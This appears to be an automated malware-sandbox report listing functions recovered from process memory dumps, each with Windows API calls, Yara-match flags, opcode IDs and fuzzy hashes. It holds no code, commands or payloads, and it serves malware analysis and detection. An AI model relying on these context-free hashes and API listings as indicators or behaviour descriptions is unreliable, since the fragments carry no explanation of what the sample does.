                                                      Function 00E19E8A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL( M,?,?,00E14D20,00000000,FFFFFFFF), ref: 00E19EB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID: M
                                                      • API String ID: 3535843008-447656482
                                                      • Opcode ID: a2d369eec825e5927d6dbdf51d168fb62880d39f20b28b61ca6b4a08c21d95ae
                                                      • Instruction ID: abedec373039e991cd65049917d1a67d9a8541538da3ee3ede88fa667a8ae900
                                                      • Opcode Fuzzy Hash: a2d369eec825e5927d6dbdf51d168fb62880d39f20b28b61ca6b4a08c21d95ae
                                                      • Instruction Fuzzy Hash: EAE08C76641214AFD720DBA8CC85EEB7B68EF553A0F1945A9F95DBB242C130A5008BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E19E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL( M,?,?,00E14D20,00000000,FFFFFFFF), ref: 00E19EB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID: M
                                                      • API String ID: 3535843008-447656482
                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction ID: 3b38196d88bc39dcf652a6d6115cb79d474fa58ceb10ffcca7388a8cae26b0f5
                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction Fuzzy Hash: 8DD012752002146BD710EB98DC85EE777ACEF44760F154455BA5C6B242C530F54086E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E19E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,00E14A01,?,?,?,?,00E14A01,FFFFFFFF,?,BM,?,00000000), ref: 00E19E55
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction ID: 85bf81312ddb808f1c21169c4fcebe2a656f3f2e747febe314b1ca467ea88cef
                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction Fuzzy Hash: 59F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158258BA1DA7241D630E8518BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E19F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00E02D11,00002000,00003000,00000004), ref: 00E19F79
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction ID: 8685825bded59ac1a1be1bc2452f5bf2d98844b3cb38b5c3fd9d2521d28c9772
                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction Fuzzy Hash: 00F015B2200208ABCB14DF89DC81EEB77ADEF88750F158158BE18A7241C630F810CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c63edee8d3befee0ad7bbb4ccb3c6fd62eb39d86a7c85a99fd5301ead058eb6e
                                                      • Instruction ID: a6ab58dbed82fbf4b1f1dc8ecfcd7434092b72734c35614a6a8c62d64c16f7e9
                                                      • Opcode Fuzzy Hash: c63edee8d3befee0ad7bbb4ccb3c6fd62eb39d86a7c85a99fd5301ead058eb6e
                                                      • Instruction Fuzzy Hash: E7900261242041667545B15944045074017A7E42857D1C012A14059A0C8966E8A6E661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b59e5118e0c164e42d66311b75da6195148245815a4ed2be914efc433bec1d4a
                                                      • Instruction ID: 1e2023ba6f7d91e05b285ca9f10e3ac4d0e0eb4c05f220fa05278b6457636266
                                                      • Opcode Fuzzy Hash: b59e5118e0c164e42d66311b75da6195148245815a4ed2be914efc433bec1d4a
                                                      • Instruction Fuzzy Hash: 2990027120100427F11161594504707001B97D4285FD1C412A04155A8D9A96D9A2B161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c547ffd2950c8b98275eeffdaffde450f5c32151cbfab4759180534fc3a286fa
                                                      • Instruction ID: 9cbd5610f7c6e9d398d2aaf1c88744a2f1fcdea7655133839c18b59453e13f3a
                                                      • Opcode Fuzzy Hash: c547ffd2950c8b98275eeffdaffde450f5c32151cbfab4759180534fc3a286fa
                                                      • Instruction Fuzzy Hash: 9F9002A120200017610571594414616401B97E4245B91C021E10055E0DC965D8E17165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 98b50f4e945ff03de4d2533af4bc01a55b92b31beb9a728d3ed759e4bfddf265
                                                      • Instruction ID: 6ad43f01784ec1b057928b25b4e303f1f46f0ff3162b89e753b22b568c647759
                                                      • Opcode Fuzzy Hash: 98b50f4e945ff03de4d2533af4bc01a55b92b31beb9a728d3ed759e4bfddf265
                                                      • Instruction Fuzzy Hash: C49002A134100456F10061594414B060017D7E5345F91C015E10555A4D8A59DCA27166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 04aa5ff70d258c0eda4c4f3f46452b22d3e7e808a30732a44be1f8b7a435de5c
                                                      • Instruction ID: b844f71528e5bf7c16eddea06fbe4b6acc7ff9e68eec115ed7eea2c4a195bfbf
                                                      • Opcode Fuzzy Hash: 04aa5ff70d258c0eda4c4f3f46452b22d3e7e808a30732a44be1f8b7a435de5c
                                                      • Instruction Fuzzy Hash: 9F900265211000172105A5590704507005797D9395391C021F10065A0CDA61D8B16161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d7f8b24978eb56d7117ec2b37f5cdb602a4d787c275ed9d583c2123854a6bd0e
                                                      • Instruction ID: d902de92832b17bd1008a7119cb1547da59810a334dcf5d4b9e5a5bfc551611f
                                                      • Opcode Fuzzy Hash: d7f8b24978eb56d7117ec2b37f5cdb602a4d787c275ed9d583c2123854a6bd0e
                                                      • Instruction Fuzzy Hash: 369002B120100416F14071594404746001797D4345F91C011A50555A4E8A99DDE576A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D996D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1896cc568257b521f73ee1ff193911b0d238589cacfcb7fed522900750f61311
                                                      • Instruction ID: 659468410d46aff959a13036ae81183b1d23b583b2f11f50daf098cccd5c1adf
                                                      • Opcode Fuzzy Hash: 1896cc568257b521f73ee1ff193911b0d238589cacfcb7fed522900750f61311
                                                      • Instruction Fuzzy Hash: 6A90027120100856F10061594404B46001797E4345F91C016A01156A4D8A55D8A17561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e0301fe0485c0ec29771305473a8e0201bf7b049e9af162bd1c748498a82c765
                                                      • Instruction ID: e48fb2020a9a7afce93381dbab462db62c5a7e02212341c50686a34b041e280c
                                                      • Opcode Fuzzy Hash: e0301fe0485c0ec29771305473a8e0201bf7b049e9af162bd1c748498a82c765
                                                      • Instruction Fuzzy Hash: 9D90027120108816F1106159840474A001797D4345F95C411A44156A8D8AD5D8E17161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e067693c4d6c559c6ecfb93c6d4756d2715f89ae75ec3a3b816290e0fab3532e
                                                      • Instruction ID: 663c8e6d3780c5dc93d2ac4a15b75f68578d5a83b4a01bd29bb7fbb9a0511d11
                                                      • Opcode Fuzzy Hash: e067693c4d6c559c6ecfb93c6d4756d2715f89ae75ec3a3b816290e0fab3532e
                                                      • Instruction Fuzzy Hash: 8D90026121180056F20065694C14B07001797D4347F91C115A01455A4CCD55D8B16561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 77e8eb9c8fc47e0bf186559480be7bbada251fbc2719e02773bed441001fd7ae
                                                      • Instruction ID: 1a3520de91db243be43b4bcf0009c170ee9ff925edd158d6d0561d13a9448a4a
                                                      • Opcode Fuzzy Hash: 77e8eb9c8fc47e0bf186559480be7bbada251fbc2719e02773bed441001fd7ae
                                                      • Instruction Fuzzy Hash: 9790027120504856F14071594404A46002797D4349F91C011A00556E4D9A65DDA5B6A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d77440031f293c9d15168c155d5558d57eed01860710050dc014787c10dae995
                                                      • Instruction ID: 22906741fc7981a544c8e3333c49cd26bb6698936d345dfcbdb9cd87117023f2
                                                      • Opcode Fuzzy Hash: d77440031f293c9d15168c155d5558d57eed01860710050dc014787c10dae995
                                                      • Instruction Fuzzy Hash: D890027120100816F1807159440464A001797D5345FD1C015A00166A4DCE55DAA977E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 95a3bae7d15ead6fd80a3635b0c4ad26de0b54ba546ddcbd91b02d46c4ce2f62
                                                      • Instruction ID: d49c9f3e942fe7d4609feb86eb04aac9519e171a039208fde4ecaebcb133a5b8
                                                      • Opcode Fuzzy Hash: 95a3bae7d15ead6fd80a3635b0c4ad26de0b54ba546ddcbd91b02d46c4ce2f62
                                                      • Instruction Fuzzy Hash: D890027131114416F11061598404706001797D5245F91C411A08155A8D8AD5D8E17162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6737bedec04ca5fa5af48da9cd3b996c1d4c59f8c0dd56053f8ed47d82c53d4c
                                                      • Instruction ID: b4f032fc0e54485ea73059a2fd406ea54f9c6e34e84dcac85ea3c365cbe9ad4d
                                                      • Opcode Fuzzy Hash: 6737bedec04ca5fa5af48da9cd3b996c1d4c59f8c0dd56053f8ed47d82c53d4c
                                                      • Instruction Fuzzy Hash: CB90026921300016F1807159540860A001797D5246FD1D415A00065A8CCD55D8B96361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D99710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4b0e20763af96e51ad6151e14dae787728a028be2dc797b9753519ec273cb1e3
                                                      • Instruction ID: 6e230d1753dfce831593a6c9c995c1658520624db3f59c79a5e22f2722d16a87
                                                      • Opcode Fuzzy Hash: 4b0e20763af96e51ad6151e14dae787728a028be2dc797b9753519ec273cb1e3
                                                      • Instruction Fuzzy Hash: 4790027120100416F10065995408646001797E4345F91D011A50155A5ECAA5D8E17171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E1A062, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00E14506,?,00E14C7F,00E14C7F,?,00E14506,?,?,?,?,?,00000000,00000000,?), ref: 00E1A05D
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E03AF8), ref: 00E1A09D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateFree
                                                      • String ID: .z`
                                                      • API String ID: 2488874121-1441809116
                                                      • Opcode ID: 7d0143c6f0db6b0a05b2973b0d93bd591d0dc5f0877b312f0eedba16aca69064
                                                      • Instruction ID: 2aa3d14ef91f55d742250b1be96a1226ad493143f7c3599b8857c6e2695f9cfc
                                                      • Opcode Fuzzy Hash: 7d0143c6f0db6b0a05b2973b0d93bd591d0dc5f0877b312f0eedba16aca69064
                                                      • Instruction Fuzzy Hash: E00126B92052446FD714DF24DC81DEB7BA8EF85314F158598F85C17302C230E854CBB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E1A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E03AF8), ref: 00E1A09D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction ID: 10fe20e5e852e44e806c2a30f0bd8d8f976364cc8f362852639c71a7c277ef37
                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction Fuzzy Hash: EDE01AB12002086BD714DF59DC45EA777ACEF88750F018554B91867241C630E9108AB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E08373, Relevance: 3.2, APIs: 2, Instructions: 193threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E0834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E0836B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 7ddf9a159cb096153a02bf5f2759f2b2fce5d8c274645e9401d82ffaa26a3d5c
                                                      • Instruction ID: b1e6e279e47ac89d5cfb752f36e68e378bfa564291adc0df7dcf23fadf1df33a
                                                      • Opcode Fuzzy Hash: 7ddf9a159cb096153a02bf5f2759f2b2fce5d8c274645e9401d82ffaa26a3d5c
                                                      • Instruction Fuzzy Hash: 5D61B2B0A00309AFDB24DF64DC85BEB77E8EF48704F10546DF559A7281DB706981CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E082F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E0834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E0836B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                      • Instruction ID: b0d0b74882e6e3deee9070cc9cc37da16cec5cde5a0379c708e7e686af09e263
                                                      • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                      • Instruction Fuzzy Hash: 0201F231A8032C7BE720A6949C43FFE77ACAB40F50F044018FF04BA1C1EAD4690642F6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E1A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E1A134
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction ID: d90aa937e51608dccbcaec544ec11806ad9ec8649f80f7d8c403d5e49f2afa64
                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction Fuzzy Hash: DE01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E1A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00E14506,?,00E14C7F,00E14C7F,?,00E14506,?,?,?,?,?,00000000,00000000,?), ref: 00E1A05D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction ID: b4a8ef85424fd4d50f96a640025a49be18a0775d423b96b0034885dfc20881f4
                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction Fuzzy Hash: 1EE012B1200208ABDB14EF99DC81EA777ACEF88660F158558BA186B242C630F9108AB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E1A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E0F1A2,00E0F1A2,?,00000000,?,?), ref: 00E1A200
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction ID: f1e5d86da4770ccffc29ba502328220ee60b35efa70cfd9cf608c2ec1d4b4b2c
                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction Fuzzy Hash: F7E01AB12002086BDB10DF49DC85EE737ADEF88650F018164BA0C67241C930E8508BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E0F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,00E08CF4,?), ref: 00E0F6CB
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                      • Instruction ID: a756c3b68edfb717f8010e2ce60245d674e5b422ad65d13b02d22eb2b3e11ebe
                                                      • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                      • Instruction Fuzzy Hash: DCD0A7B17903043BE610FAA49C03F6633CD6B44B04F490074FA48EB3C3D950E40041A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D9967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.505341361.0000000004D30000.00000040.00000001.sdmp, Offset: 04D30000, based on PE: true
                                                      • Associated: 00000004.00000002.505749200.0000000004E4B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000004.00000002.505759179.0000000004E4F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c1a4a52c05b63c31b98d4542d20a62bd38c7659af5e5b02c927a974a5deb1270
                                                      • Instruction ID: cc2f39512b562975cef7a49d55746878bf34e962eb40f6854028fa8b297e9de4
                                                      • Opcode Fuzzy Hash: c1a4a52c05b63c31b98d4542d20a62bd38c7659af5e5b02c927a974a5deb1270
                                                      • Instruction Fuzzy Hash: 25B02BB18010C0C9FB00D7600608717390177C0300F12C051D1020290A0738D0D0F1B1
